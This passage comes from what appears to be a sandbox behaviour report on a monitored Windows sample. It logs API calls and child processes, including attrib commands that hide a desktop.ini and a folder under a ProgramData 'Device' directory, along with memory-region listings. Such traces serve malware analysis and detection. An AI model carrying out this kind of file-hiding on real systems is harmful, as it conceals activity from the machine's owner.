lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.989] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0150.028] _close (_FileHandle=4) returned 0 [0150.028] FindNextFileW (in: hFindFile=0x32e768, lpFindFileData=0x2aee50 | out: lpFindFileData=0x2aee50) returned 0 [0150.028] GetLastError () returned 0x12 [0150.028] FindClose (in: hFindFile=0x32e768 | out: hFindFile=0x32e768) returned 1 
[0150.029] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0150.031] _close (_FileHandle=3) returned 0 [0150.031] GetConsoleTitleW (in: lpConsoleTitle=0x2af288, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.031] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0150.031] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0150.031] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0150.031] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0xffffffff [0150.031] GetLastError () returned 0x2 [0150.031] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0xffffffff [0150.032] GetLastError () returned 0x2 [0150.032] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0x332ed8 [0150.032] FindClose (in: hFindFile=0x332ed8 | out: hFindFile=0x332ed8) returned 1 [0150.032] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0xffffffff [0150.032] GetLastError () returned 0x2 [0150.032] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0x332ed8 [0150.032] FindClose (in: hFindFile=0x332ed8 | out: hFindFile=0x332ed8) returned 1 [0150.032] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0150.032] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0150.032] GetConsoleTitleW (in: lpConsoleTitle=0x2af01c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.032] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aeea4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aef6c | out: lpAttributeList=0x2aeea4, lpSize=0x2aef6c) returned 1 [0150.032] UpdateProcThreadAttribute (in: lpAttributeList=0x2aeea4, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aef64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aeea4, lpPreviousValue=0x0) returned 1 [0150.032] GetStartupInfoW (in: lpStartupInfo=0x2aee60 | out: lpStartupInfo=0x2aee60*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0150.032] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0150.032] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2aef00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, 
dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aef4c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" ", lpProcessInformation=0x2aef4c*(hProcess=0x4c, hThread=0x50, dwProcessId=0xbd4, dwThreadId=0xb94)) returned 1 [0150.034] CloseHandle (hObject=0x50) returned 1 [0150.034] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0150.034] GetEnvironmentStringsW () returned 0x332ed8* [0150.035] FreeEnvironmentStringsW (penv=0x332ed8) returned 1 [0150.035] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0150.076] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2aee40 | out: lpExitCode=0x2aee40*=0x0) returned 1 [0150.076] CloseHandle (hObject=0x4c) returned 1 [0150.076] _vsnwprintf (in: _Buffer=0x2aef88, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aee4c | out: _Buffer="00000000") returned 8 [0150.076] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0150.076] GetEnvironmentStringsW () returned 0x332ed8* [0150.076] FreeEnvironmentStringsW (penv=0x332ed8) returned 1 [0150.076] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0150.076] GetEnvironmentStringsW () returned 0x332ed8* [0150.076] FreeEnvironmentStringsW (penv=0x332ed8) returned 1 [0150.076] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aeea4 | out: lpAttributeList=0x2aeea4) [0150.076] GetConsoleTitleW (in: lpConsoleTitle=0x2af288, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.077] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0150.077] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0150.077] GetEnvironmentVariableW 
(in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0150.077] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0xffffffff [0150.077] GetLastError () returned 0x2 [0150.077] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0xffffffff [0150.077] GetLastError () returned 0x2 [0150.077] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0x32e768 [0150.077] FindClose (in: hFindFile=0x32e768 | out: hFindFile=0x32e768) returned 1 [0150.077] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0xffffffff [0150.078] GetLastError () returned 0x2 [0150.078] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0x32e768 [0150.078] FindClose (in: hFindFile=0x32e768 | out: hFindFile=0x32e768) returned 1 [0150.078] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0150.078] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0150.078] GetConsoleTitleW (in: lpConsoleTitle=0x2af01c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.078] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aeea4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aef6c | 
out: lpAttributeList=0x2aeea4, lpSize=0x2aef6c) returned 1 [0150.078] UpdateProcThreadAttribute (in: lpAttributeList=0x2aeea4, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aef64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aeea4, lpPreviousValue=0x0) returned 1 [0150.078] GetStartupInfoW (in: lpStartupInfo=0x2aee60 | out: lpStartupInfo=0x2aee60*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0150.078] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0150.078] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2aef00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aef4c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\"", lpProcessInformation=0x2aef4c*(hProcess=0x50, hThread=0x4c, dwProcessId=0x610, dwThreadId=0x47c)) returned 1 [0150.080] CloseHandle (hObject=0x4c) returned 1 [0150.080] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0150.080] GetEnvironmentStringsW () returned 0x333938* [0150.080] FreeEnvironmentStringsW (penv=0x333938) returned 1 [0150.080] 
WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0150.206] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2aee40 | out: lpExitCode=0x2aee40*=0x0) returned 1 [0150.206] CloseHandle (hObject=0x50) returned 1 [0150.206] _vsnwprintf (in: _Buffer=0x2aef88, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aee4c | out: _Buffer="00000000") returned 8 [0150.206] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0150.207] GetEnvironmentStringsW () returned 0x333938* [0150.207] FreeEnvironmentStringsW (penv=0x333938) returned 1 [0150.207] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0150.207] GetEnvironmentStringsW () returned 0x333938* [0150.207] FreeEnvironmentStringsW (penv=0x333938) returned 1 [0150.207] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aeea4 | out: lpAttributeList=0x2aeea4) [0150.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.207] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0150.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.207] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0150.207] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.207] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0150.208] SetConsoleInputExeNameW () returned 0x1 [0150.208] GetConsoleOutputCP () returned 0x1b5 [0150.208] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.208] SetThreadUILanguage (LangId=0x0) returned 0x409 [0150.208] exit (_Code=0) Process: id = "232" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16dc0" os_pid = "0xbc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "231" os_parent_pid = "0x698" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" " 
cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19330 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19331 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19332 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19333 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 19334 start_va = 0x3c0000 end_va = 0x3c6fff entry_point = 0x3c0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 19335 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19336 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19337 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19338 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = 
private name = "private_0x000000007ffd9000" filename = "" Region: id = 19339 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19340 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19341 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19342 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19343 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 19344 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 19345 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 19346 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19347 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 19348 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19349 start_va = 0x76910000 end_va = 0x769e3fff 
entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19350 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19351 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19352 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19353 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19354 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 19355 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19356 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19357 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 19358 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = 
"\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19359 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 294 os_tid = 0xc88 Process: id = "233" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16b40" os_pid = "0xbd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "231" os_parent_pid = "0x698" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19466 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19467 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19468 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19469 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 19470 start_va = 0x480000 end_va = 0x486fff entry_point = 0x480000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 19471 
start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19472 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19473 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19474 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 19475 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19476 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19477 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19478 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19479 start_va = 0x1a0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 19480 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 19481 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 19482 start_va = 0x75540000 
